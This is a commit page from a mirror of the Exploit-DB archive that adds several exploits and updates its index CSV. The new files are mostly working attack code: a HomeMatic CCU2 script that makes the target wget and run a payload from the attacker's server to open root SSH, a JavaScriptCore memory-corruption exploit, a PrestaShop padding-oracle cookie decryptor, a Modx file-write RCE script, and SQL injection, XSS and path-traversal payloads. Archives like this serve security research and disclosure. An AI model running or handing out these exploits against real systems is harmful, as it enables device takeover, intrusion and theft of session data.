bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2018-07-19

Browse source 
8 changes to exploits/shellcodes

JavaScript Core - Arbitrary Code Execution
QNAP Q'Center - change_passwd Command Execution (Metasploit)
Nanopool Claymore Dual Miner - APIs RCE (Metasploit)
QNAP Q'Center - 'change_passwd' Command Execution (Metasploit)
Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)
HomeMatic Zentrale CCU2 - Remote Code Execution

MailGust 1.9 - Board Takeover SQL Injection
MailGust 1.9 - Board Takeover (SQL Injection)

Cyphor 0.19 - Board Takeover SQL Injection
Cyphor 0.19 - Board Takeover (SQL Injection)

versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection
versatileBulletinBoard 1.00 RC2 - Board Takeover (SQL Injection)

WordPress 2.6.1 - SQL Column Truncation Admin Takeover
WordPress 2.6.1 - Admin Takeover (SQL Column Truncation)

Invision Power Board 1.x?/2.x/3.x - Admin Account Takeover
Invision Power Board 1.x?/2.x/3.x - Admin Takeover

Joomla! < 3.6.4 - Admin TakeOver
Joomla! < 3.6.4 - Admin Takeover
PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation
PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation
Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection
Open-AudIT Community 2.1.1 - Cross-Site Scripting
FTP2FTP 1.0 - Arbitrary File Download
Modx Revolution < 2.6.4 - Remote Code Execution
This commit is contained in:
Offensive Security 2018-07-19 05:01:43 +00:00
parent 1f88d0a67a
commit a2ac269de5
9 changed files with 2080 additions and 8 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

140
exploits/hardware/remote/45052.py Executable file
View file

@ -0,0 +1,140 @@
# Exploit Title: HomeMatic Zentrale CCU2 Unauthenticated RCE
# Date: 16-07-2018
# Software Link: https://www.homematic.com/
# Exploit Author: Kacper Szurek - ESET
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# YouTube: https://www.youtube.com/c/KacperSzurek
# Category: remote
1. Description
File: /root/www/api/backup/logout.cgi
```
proc main { } {
set sid [getQueryArg sid]
if [catch { session_logout $sid}] { error LOGOUT }
puts "Content-Type: text/plain"
puts ""
puts "OK"
}
```
`$sid` value is passed directly to `session_logout` function.
File: /root/www/tcl/eq3/session.tcl
```
proc session_logout { sid } {
rega_exec "system.ClearSessionID(\"$sid\");"
}
```
`$sid` value is not escaped properly.
We can close current rega script using `");` and execute our payload.
2. Proof of Concept
POC in Python which enable ssh access and change root password without any credentials.
```
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import time
import urllib2
import threading
import sys
import os
import signal
print "HomeMatic Zentrale CCU2 Unauthenticated RCE"
print "Unauthenticated Remote Code Execution"
print "by Kacper Szurek - ESET"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
print "https://www.youtube.com/c/KacperSzurek\n"
def signal_handler(a, b):
print "[+] Exit"
os._exit(0)
signal.signal(signal.SIGINT, signal_handler)
if len(sys.argv) != 4:
print "Usage: exploit <your_ip> <homematic_ip> <new_password>"
os._exit(0)
our_ip = sys.argv[1]
homematic_ip = sys.argv[2]
new_password = sys.argv[3]
tcl_file = """
#!/bin/tclsh
source /www/api/eq3/jsonrpc.tcl
source /www/api/eq3/json.tcl
set args(passwd) "{}"
set args(mode) "true"
source /www/api/methods/ccu/setssh.tcl
source /www/api/methods/ccu/setsshpassword.tcl
source /www/api/methods/ccu/restartsshdaemon.tcl
""".format(new_password)
class StoreHandler(BaseHTTPRequestHandler):
def do_GET(self):
print self.path
if self.path == '/exploit':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(tcl_file)
def server():
try:
server = HTTPServer((our_ip, 1234), StoreHandler)
server.serve_forever()
except Exception, e:
print "[-] Cannot start web server: {}".format(e)
os._exit(0)
def send_payload(payload):
return urllib2.urlopen('http://{}/api/backup/logout.cgi?sid=aa");system.Exec("{}");system.ClearSessionID("bb'.format(homematic_ip, payload)).read()
try:
version = urllib2.urlopen('http://{}/api/backup/version.cgi'.format(homematic_ip), timeout=6).read()
except:
version = ""
if not version.startswith('VERSION='):
print "[-] Probably not HomeMatic IP: {}".format(homematic_ip)
os._exit(0)
if "'" in new_password or '"' in new_password:
print "[-] Forbidden characters in password"
os._exit(0)
print "[+] Start web server"
t = threading.Thread(target=server)
t.daemon = True
t.start()
time.sleep(2)
print "[+] Download exploit"
send_payload('wget+-O+/tmp/exploit+http://{}:1234/exploit&&chmod+%2bx+/tmp/exploit'.format(our_ip))
print "[+] Set chmod +x"
send_payload('chmod+%2bx+/tmp/exploit')
print "[+] Execute exploit"
send_payload('/bin/tclsh+/tmp/exploit')
print "[+] Success, now you can ssh as root:"
print "ssh root@{}".format(homematic_ip)
print "Password: {}".format(new_password)
os._exit(0)
```
3. Solution:
Update to version 2.35.16

323
exploits/multiple/local/45048.js Normal file
View file

@ -0,0 +1,323 @@
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');
// Helpers to convert from float to in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);
var floatarr_magic = new Int64('0x3131313131313131').asDouble();
var floatarr_magic = new Int64('0x3131313131313131').asDouble();
var jsval_magic = new Int64('0x3232323232323232').asDouble();
var structs = [];
function log(x) {
print(x);
}
// Look OOB for array we can use with JSValues
function findArrayOOB(corrupted_arr, groom) {
log("Looking for JSValue array with OOB Float array");
for (let i = 0; i<corrupted_arr.length; i++) {
convf[0] = corrupted_arr[i];
// Find the magic value we stored in the JSValue Array
if (convi[0] == 0x10) {
convf[0] = corrupted_arr[i+1];
if (convi[0] != 0x32323232)
continue;
// Change the first element of the array
corrupted_arr[i+1] = new Int64('0x3131313131313131').asDouble();
let target = null;
// Find which array we modified
for (let j = 0; j<groom.length; j++) {
if (groom[j][0] != jsval_magic) {
target = groom[j];
break
}
}
log("Found target array for addrof/fakeobj");
// This object will hold our primitives
let prims = {};
let oob_ind = i+1;
// Get the address of a given jsobject
prims.addrof = function(x) {
// To do this we put the object in the jsvalue array and
// access it OOB with our float array
target[0] = x;
return Int64.fromDouble(corrupted_arr[oob_ind]);
}
// Return a jsobject at a given address
prims.fakeobj = function(addr) {
// To do this we overwrite the first slot of the jsvalue array
// with the OOB float array
corrupted_arr[oob_ind] = addr.asDouble();
return target[0];
}
return prims;
}
}
}
// Here we will spray structure IDs for Float64Arrays
// See http://www.phrack.org/papers/attacking_javascript_engines.html
function sprayStructures() {
function randomString() {
return Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 5);
}
// Spray arrays for structure id
for (let i = 0; i < 0x1000; i++) {
let a = new Float64Array(1);
// Add a new property to create a new Structure instance.
a[randomString()] = 1337;
structs.push(a);
}
}
// Here we will create our fake typed array and get arbitrary read/write
// See http://www.phrack.org/papers/attacking_javascript_engines.html
function getArb(prims) {
sprayStructures()
let utarget = new Uint8Array(0x10000);
utarget[0] = 0x41;
// Our fake array
// Structure id guess is 0x200
// [ Indexing type = 0 ][ m_type = 0x27 (float array) ][ m_flags = 0x18 (OverridesGetOwnPropertySlot) ][ m_cellState = 1 (NewWhite)]
let jscell = new Int64('0x0118270000000200');
// Construct the object
// Each attribute will set 8 bytes of the fake object inline
obj = {
'a': jscell.asDouble(),
// Butterfly can be anything
'b': false,
// Target we want to write to
'c': utarget,
// Length and flags
'd': new Int64('0x0001000000000010').asDouble()
};
// Get the address of the values we stored in obj
let objAddr = prims.addrof(obj).add(16);
log("Obj addr + 16 = "+objAddr);
// Create a fake object from this pointer
let fakearray = prims.fakeobj(objAddr);
// Attempt to find a valid ID for our fake object
while(!(fakearray instanceof Float64Array)) {
jscell.add(1);
obj['a'] = jscell.asDouble();
}
log("Matched structure id!");
// Set data at a given address
prims.set = function(addr, arr) {
fakearray[2] = addr.asDouble();
utarget.set(arr);
}
// Read 8 bytes as an Int64 at a given address
prims.read64 = function(addr) {
fakearray[2] = addr.asDouble();
let bytes = Array(8);
for (let i=0; i<8; i++) {
bytes[i] = utarget[i];
}
return new Int64(bytes);
}
// Write an Int64 as 8 bytes at a given address
prims.write64 = function(addr, value) {
fakearray[2] = addr.asDouble();
utarget.set(value.bytes);
}
}
// Here we will use build primitives to eventually overwrite the JIT page
function exploit(corrupted_arr, groom) {
save.push(groom);
save.push(corrupted_arr);
// Create fakeobj and addrof primitives
let prims = findArrayOOB(corrupted_arr, groom);
// Upgrade to arb read/write from OOB read/write
getArb(prims);
// Build an arbitrary JIT function
// This was basically just random junk to make the JIT function larger
let jit = function(x) {
var j = []; j[0] = 0x6323634;
return x*5 + x - x*x /0x2342513426 +(x - x+0x85720642 *(x +3 -x / x+0x41424344)/0x41424344)+j[0]; };
// Make sure the JIT function has been compiled
jit();
jit();
jit();
// Traverse the JSFunction object to retrieve a non-poisoned pointer
log("Finding jitpage");
let jitaddr = prims.read64(
prims.read64(
prims.read64(
prims.read64(
prims.addrof(jit).add(3*8)
).add(3*8)
).add(3*8)
).add(5*8)
);
log("Jit page addr = "+jitaddr);
// Overwrite the JIT code with our INT3s
log("Writting shellcode over jit page");
prims.set(jitaddr.add(32), [0xcc, 0xcc, 0xcc, 0xcc]);
// Call the JIT function, triggering our INT3s
log("Calling jit function");
jit();
throw("JIT returned");
}
// Find and set the length of a non-freed butterfly with our unstable OOB primitive
function setLen(uaf_arr, ind) {
let f=0;
for (let i=0; i<uaf_arr.length; i++) {
convf[0] = uaf_arr[i];
// Look for a new float array, and set the length
if (convi[0] == 0x10) {
convf[0] = uaf_arr[i+1];
if (convi[0] == 0x32323232 && convi[1] == 0x32323232) {
convi[0] = 0x42424242;
convi[1] = 0x42424242;
uaf_arr[i] = convf[0];
return;
}
}
}
throw("Could not find anouther array to corrupt");
}
let oob_rw_unstable = null;
let oob_rw_unstable_ind = null;
let oob_rw_stable = null;
// After this point we would stop seeing GCs happen enough to race :(
const limit = 10;
const butterfly_size = 32
let save = [0, 0]
for(let at = 0; at < limit; at++) {
log("Trying to race GC and array.reverse() Attempt #"+(at+1));
// Allocate the initial victim and target arrays
let victim_arrays = new Array(2048);
let groom = new Array(2048);
for (let i=0; i<victim_arrays.length; i++) {
victim_arrays[i] = new Array(butterfly_size).fill(floatarr_magic)
groom[i] = new Array(butterfly_size/2).fill(jsval_magic)
}
let vv = [];
let v = []
// Allocate large strings to trigger the GC while calling reverse
for (let i = 0; i < 506; i++) {
for(let j = 0; j < 0x100; j++) {
// Cause GCs to trigger while we are racing with reverse
if (j == 0x44) { v.push(new String("B").repeat(0x10000*save.length/2)) }
victim_arrays.reverse()
}
}
for (let i = 0; i < victim_arrays.length; i++) {
// Once we see we have replaced a free'd butterfly
// fill the replacing array with 0x41414141... to smash rest
// of UAF'ed butterflies
// We know the size will be 506, because it will have been replaced with v
// we were pushing into in the loop above
if(victim_arrays[i].length == 506) {
victim_arrays[i].fill(2261634.5098039214)
}
// Find the first butterfly we have smashed
// this will be an unstable OOB r/w
if(victim_arrays[i].length == 0x41414141) {
oob_rw_unstable = victim_arrays[i];
oob_rw_unstable_ind = i;
break;
}
}
// If we successfully found a smashed and still freed butterfly
// use it to corrupt a non-freed butterfly for stability
if(oob_rw_unstable) {
setLen(oob_rw_unstable, oob_rw_unstable_ind)
for (let i = 0; i < groom.length; i++) {
// Find which array we just corrupted
if(groom[i].length == 0x42424242) {
oob_rw_stable = groom[i];
break;
}
}
if (!oob_rw_stable) {
throw("Groom seems to have failed :(");
}
}
// chew CPU to avoid a segfault and help with gc schedule
for (let i = 0; i < 0x100000; i++) { }
// Attempt to clean up some
let f = []
for (let i = 0; i < 0x2000; i++) {
f.push(new Array(16).fill(2261634.6098039214))
}
save.push(victim_arrays)
save.push(v)
save.push(f)
save.push(groom)
if (oob_rw_stable) {
log("Found stable corrupted butterfly! Now the fun begins...");
exploit(oob_rw_stable, groom);
break;
}
}
throw("Failed to find any UAF'ed butterflies");

68
exploits/multiple/webapps/45053.txt Normal file
View file

@ -0,0 +1,68 @@
#######################################
# Exploit Title: Open-AudIT Community - 2.1.1 - Cross Site Scripting Vulnerability
# Google Dork:NA
# #######################################
# Exploit Author: Ranjeet Jaiswal#
#######################################
# Vendor Homepage: https://opmantek.com/
# Software Link:http://dl-openaudit.opmantek.com/OAE-Win-x86_64-
release_2.2.1.exe
# Affected Version: 2.1.1
# Category: WebApps
# Tested on: Windows 10
# CVE : CVE-2018-11124
#
# 1. Vendor Description:
#
# Network Discovery and Inventory Software | Open-AudIT | Opmantek
Discover what's on your network
Open-AudIT is the world's leading network discovery, inventory and audit
program. Used by over 10,000 customers.
#
# 2. Technical Description:
#
# Cross-site scripting (XSS) vulnerability in Attributes functionality in
Open-AudIT Community edition before 2.2.2 allows remote attackers to inject
arbitrary web script or HTML via a crafted attribute name of a Attribute,
as demonstrated in below POC.
#
# 3. Proof Of Concept:
3.1. Proof of Concept for Injecting html contain
# #Step to reproduce.
Step1:Login in to Open-Audit
Step2:Go to Attributes page
Step3:Select any attribute which are listed
Step4:click on details tab.
Step5:In the Name field put the following payload and click submit.
<p>Sorry! We have moved! The new URL is: <a href="http://geektyper.com/">
Open-Audit</a></p>
Step6:Go to export tab and export using HTML Table
Step7:When user open download attribute.html file.You will see redirection
hyperlink.
Step8:When user click on link ,User will be redirected to Attacker or
malicious website.
3.2. Proof of Concept for Injecting web script(Cross-site scripting(XSS))
# #Step to reproduce.
Step1:Login in to Open-Audit
Step2:Go to Attributes page
Step3:Select any attribute which are listed
Step4:click on details tab.
Step5:In the Name field put the following payload and click submit.
<script>alert(hack)</script>
Step6:Go to export tab and export using HTML Table
Step7:When user open download attribute.html file.Alert Popup will execute.
# 4. Solution:
#
# Upgrade to latest release of Open-AudIT version
# https://opmantek.com/network-tools-download/open-audit/

95
exploits/php/webapps/45046.py Executable file
View file

@ -0,0 +1,95 @@
#!/usr/bin/env python3
# PrestaShop <= 1.6.1.19 AES (Rijndael) / openssl_encrypt() Cookie Read
# Charles Fol
#
# See https://ambionics.io/blog/prestashop-privilege-escalation
#
# This POC will reveal the content of an employee's cookie.
# By modifying it one can read/write any PrestaShop cookie.
# It is a simple padding oracle implementation.
#
import requests
import urllib.parse
import base64
s = requests.Session()
"""
s.proxies = {
'http': 'localhost:8080',
'https': 'localhost:8080',
}
#"""
# Login as an employee, get your cookie and paste it here along with the URL
URL = "http://vmweb5/prestashop/admin177chuncw/"
cookie = "PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq6U2Ew2n5aMUOYqkrkpqjputuLiBEqqW7pIce8cUv%2F3SEFp3tPnWfCgJgXKUsR1htOQ4KAoXyYLhoc31kVgcm39OhQh5Zg3A78HnO1On2udHwN8dTRdI86kewEFZPNtmMeBF7sAr9zezevsjK1VU4BI84EVXCYQuuhnVehoqfAa9XoZC%2FD3FEmDSuspZw2AUB0S7Py6ks6eEeCVDWieBKDsHD13UK%2FzgM%2F65m5rpU1P4BSQSHN2Qs%3D000208"
# Parse blocks and size
cookie_name, cookie_value = cookie.split("=")
cookie_value = urllib.parse.unquote(cookie_value)
cookie_size = cookie_value[-6:]
cookie_value = cookie_value[:-6]
cookie_value = base64.b64decode(cookie_value)
BLOCK_SIZE = 16
def test_padding(data):
"""Returns true if the padding is correct, false otherwise.
One can easily adapt it for customer cookies using:
index.php?controller=identity
"""
data = base64.b64encode(data).decode()
data = urllib.parse.quote(data)
data = data + cookie_size
s.cookies[cookie_name] = data
r = s.get(URL, allow_redirects=False)
s.cookies.clear()
return 'AdminLogin' not in r.headers.get('Location', '')
def e(msg):
print(msg)
exit(1)
if not test_padding(cookie_value):
e("Invalid cookie (1)")
elif test_padding(b"~~~~~"):
e("Invalid cookie (2)")
# Perform the padding oracle attack
result = b''
for b in range(1, len(cookie_value) // BLOCK_SIZE + 1):
obtained = []
current_block = cookie_value[(b ) * BLOCK_SIZE:][:BLOCK_SIZE]
precedent_block = cookie_value[(b - 1) * BLOCK_SIZE:][:BLOCK_SIZE]
for p in range(BLOCK_SIZE):
nb_obtained = len(obtained)
for i in range(256):
pad = nb_obtained + 1
prelude = (
b"\x00" * (BLOCK_SIZE - pad) +
bytes([i]) +
bytes([o ^ pad for o in obtained][::-1])
)
data = cookie_value + prelude + current_block
if test_padding(data):
print("Got byte #%d of block #%d: %d" % (p, b, i))
obtained.append(i ^ pad)
break
else:
e("Unable to decode position %d" % p)
# Compute the contents of the plaintext block
result += bytes([o ^ p for p, o in zip(precedent_block, obtained[::-1])])
try:
print("COOKIE: %s" % result.decode())
except UnicodeDecodeError:
print("COOKIE: Unable to decode, wait for next block")

1267
exploits/php/webapps/45047.txt Normal file
View file

File diff suppressed because it is too large Load diff

52
exploits/php/webapps/45049.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: Smart SMS & Email Manager v3.3 - SQL Injection
# Google Dork: N/A
# Date: 17.07.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/smart-sms-email-manager-ssem/14817919
# Version: 3.3
# Tested on: Kali linux
====================================================
The vulnerability allows an attacker to inject sql commands
from the search section with 'contact_type_id' parameter in the admin panel.
# PoC : SQLi :
http://site.net/phonebook/contact_list_data
POST /phonebook/contact_list_data HTTP/1.1
Host: site.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.net/phonebook/contact_list
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 141
Cookie:
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d61b9083afe2435321ba518449f3b108%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22213.14.165.138%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A52.0%29+Gecko%2F20100101+Firefox%2F52.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1531824069%3B%7Dce4c26e8ee366999ae805f61eba75b1a;
xerone_dolphin=6811071531824070937
Connection: keep-alive
first_name=Test&last_name=test&phone_number=5555555&email=test%40test.com
&dob=07%2F04%2F2018&contact_type_id=280&is_searched=1&page=1&rows=10
Parameter: contact_type_id (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause
Payload: client_username=tes&contact_type_id=142' RLIKE (SELECT (CASE
WHEN (5715=5715) THEN 142 ELSE 0x28 END)) AND 'Jeop' LIKE
'Jeop&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload: client_username=tes&contact_type_id=142' AND
EXTRACTVALUE(4506,CONCAT(0x5c,0x7176716271,(SELECT
(ELT(4506=4506,1))),0x7171707071)) AND 'vZFG' LIKE
'vZFG&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20
====================================================

34
exploits/php/webapps/45054.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: FTP2FTP 1.0 - Arbitrary File Download
# Dork: N/A
# Date: 18.07.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/ftp2ftp-server-to-server-file-transfer-php-script/21972395
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The "download2.php" is vulnerable in the admin panel.
The attacker can download and read all files known by the name via 'id' parameter.
====================================================
# Vuln file : /FTP2FTP/download2.php
1. <?php
2. $file = "tempFiles2/".$_GET['id'];
3.
4.
5. if (file_exists($file)) {
6. header('Content-Description: File Transfer');
7. header('Content-Type: application/octet-stream');
8. header('Content-Disposition: attachment; filename="'.basename($file).'"');
9. header('Expires: 0');
10. header('Cache-Control: must-revalidate');
11. header('Pragma: public');
12. header('Content-Length: ' . filesize($file));
13. readfile($file);
14. exit;
15. }
16. ?>
# PoC : http://sitenet/FTP2FTP/download2.php?id=../index.php

85
exploits/php/webapps/45055.py Executable file
View file

@ -0,0 +1,85 @@
# Exploit Title: Modx Revolution < 2.6.4 - Remote Code Execution
# Date: 2018-07-13
# Exploit Author: Vitalii Rudnykh
# Vendor Homepage: https://modx.com/
# Version: <= 2.6.4
# CVE : CVE-2018-1000207
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import requests
from colorama import init, Fore, Style
try:
init()
def cls():
os.system('cls' if os.name == 'nt' else 'clear')
cls()
print(Fore.BLUE +
'################################################################')
print(Fore.CYAN +
'# Proof-Of-Concept for CVE-2018-1000207 (Modx Revolution)')
print('# by Vitalii Rudnykh')
print('# Thanks by AgelNash')
print('# https://github.com/a2u/CVE-2018-1000207/')
print(Fore.BLUE +
'################################################################')
print('Provided only for educational or information purposes')
print(Style.RESET_ALL)
target = input('Enter target url (example: http(s)://domain.tld/): ')
verify = True
code = '<?php echo md5(\'a2u\'); unlink($_SERVER[\'SCRIPT_FILENAME\']);?>'
if requests.get(
target + '/connectors/system/phpthumb.php',
verify=verify).status_code != 404:
print(Fore.GREEN + '/connectors/system/phpthumb.php - found')
url = target + '/connectors/system/phpthumb.php'
payload = {
'ctx': 'web',
'cache_filename': '../../payload.php',
'useRawIMoutput': '1',
'src': '.',
'IMresizedData': code,
'config_prefer_imagemagick': '0'
}
r = requests.post(url, data=payload, verify=verify)
check = requests.get(target + 'payload.php', verify=verify)
if check.text == '9bdc11de19fd93975bf9c9ec3dd7292d':
print(Fore.GREEN + 'Exploitable!\n')
else:
print(Fore.RED + 'Not exploitable!\n')
else:
print(Fore.RED + 'phpthumb.php - not found')
if requests.get(
target + '/assets/components/gallery/connector.php',
verify=verify).status_code != 404:
print(Fore.GREEN + '/assets/components/gallery/connector.php - found')
url = target + '/assets/components/gallery/connector.php'
payload = {
'action': 'web/phpthumb',
'f': 'php',
'useRawIMoutput': '1',
'IMresizedData': 'Ok',
'config_prefer_imagemagick': '0'
}
r = requests.post(url, data=payload, verify=verify)
if r.text == 'Ok':
print(Fore.GREEN + 'Exploitable!\n')
else:
print(Fore.RED + 'Not exploitable!\n')
else:
print(
Fore.RED + '/assets/components/gallery/connector.php - not found')
except KeyboardInterrupt:
cls()

24
files_exploits.csv
View file

@ -9818,6 +9818,7 @@ id,file,description,date,author,type,platform,port
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
45041,exploits/hardware/local/45041.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape",2018-07-17,LiquidWorm,local,hardware,
45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16624,8 +16625,9 @@ id,file,description,date,author,type,platform,port
45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
45040,exploits/hardware/remote/45040.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials",2018-07-17,LiquidWorm,remote,hardware,
45043,exploits/linux/remote/45043.rb,"QNAP Q'Center - change_passwd Command Execution (Metasploit)",2018-07-17,Metasploit,remote,linux,443
45044,exploits/multiple/remote/45044.rb,"Nanopool Claymore Dual Miner - APIs RCE (Metasploit)",2018-07-17,Metasploit,remote,multiple,3333
45043,exploits/linux/remote/45043.rb,"QNAP Q'Center - 'change_passwd' Command Execution (Metasploit)",2018-07-17,Metasploit,remote,linux,443
45044,exploits/multiple/remote/45044.rb,"Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)",2018-07-17,Metasploit,remote,multiple,3333
45052,exploits/hardware/remote/45052.py,"HomeMatic Zentrale CCU2 - Remote Code Execution",2018-07-18,"Kacper Szurek",remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -16792,13 +16794,13 @@ id,file,description,date,author,type,platform,port
1221,exploits/php/webapps/1221.php,"CuteNews 1.4.0 - Shell Injection / Remote Command Execution",2005-09-17,rgod,webapps,php,
1225,exploits/php/webapps/1225.php,"My Little Forum 1.5 - 'SearchString' SQL Injection",2005-09-22,rgod,webapps,php,
1226,exploits/php/webapps/1226.php,"phpMyFAQ 1.5.1 - 'User-Agent' Remote Shell Injection",2005-09-23,rgod,webapps,php,
1227,exploits/php/webapps/1227.php,"MailGust 1.9 - Board Takeover SQL Injection",2005-09-24,rgod,webapps,php,
1227,exploits/php/webapps/1227.php,"MailGust 1.9 - Board Takeover (SQL Injection)",2005-09-24,rgod,webapps,php,
1236,exploits/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution (Metasploit)",2005-09-27,"Nicolas Gregoire",webapps,cgi,
1237,exploits/php/webapps/1237.php,"PHP-Fusion 6.00.109 - 'msg_send' SQL Injection",2005-09-28,rgod,webapps,php,
1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php,
1241,exploits/php/webapps/1241.php,"Cyphor 0.19 - Board Takeover SQL Injection",2005-10-08,rgod,webapps,php,
1241,exploits/php/webapps/1241.php,"Cyphor 0.19 - Board Takeover (SQL Injection)",2005-10-08,rgod,webapps,php,
1244,exploits/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,webapps,php,
1245,exploits/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection",2005-10-10,rgod,webapps,php,
1245,exploits/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - Board Takeover (SQL Injection)",2005-10-10,rgod,webapps,php,
1250,exploits/php/webapps/1250.php,"w-Agora 4.2.0 - 'quicklist.php' Remote Code Execution",2005-10-14,rgod,webapps,php,
1252,exploits/asp/webapps/1252.html,"MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection",2005-10-15,nukedx,webapps,asp,
1270,exploits/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution",2005-10-23,rgod,webapps,php,
@ -20251,7 +20253,7 @@ id,file,description,date,author,type,platform,port
6417,exploits/php/webapps/6417.txt,"AvailScript Jobs Portal Script - 'jid' SQL Injection",2008-09-10,InjEctOr5,webapps,php,
6419,exploits/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,webapps,php,
6420,exploits/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,webapps,asp,
6421,exploits/php/webapps/6421.php,"WordPress 2.6.1 - SQL Column Truncation Admin Takeover",2008-09-10,iso^kpsbr,webapps,php,
6421,exploits/php/webapps/6421.php,"WordPress 2.6.1 - Admin Takeover (SQL Column Truncation)",2008-09-10,iso^kpsbr,webapps,php,
6422,exploits/php/webapps/6422.txt,"PHPVID 1.1 - Cross-Site Scripting / SQL Injection",2008-09-10,r45c4l,webapps,php,
6423,exploits/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection",2008-09-10,Cru3l.b0y,webapps,php,
6425,exploits/php/webapps/6425.txt,"PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",webapps,php,
@ -28333,7 +28335,7 @@ id,file,description,date,author,type,platform,port
25437,exploits/php/webapps/25437.txt,"eGroupWare 1.0 - 'index.php?cats_app' SQL Injection",2005-04-18,"GulfTech Security",webapps,php,
25438,exploits/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",webapps,php,
25440,exploits/php/webapps/25440.txt,"WordPress Plugin wp-FileManager - Arbitrary File Download",2013-05-14,ByEge,webapps,php,
25441,exploits/php/webapps/25441.txt,"Invision Power Board 1.x?/2.x/3.x - Admin Account Takeover",2013-05-14,"John JEAN",webapps,php,
25441,exploits/php/webapps/25441.txt,"Invision Power Board 1.x?/2.x/3.x - Admin Takeover",2013-05-14,"John JEAN",webapps,php,
25442,exploits/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php?id' SQL Injection",2013-05-14,"Ahmed Aboul-Ela",webapps,php,
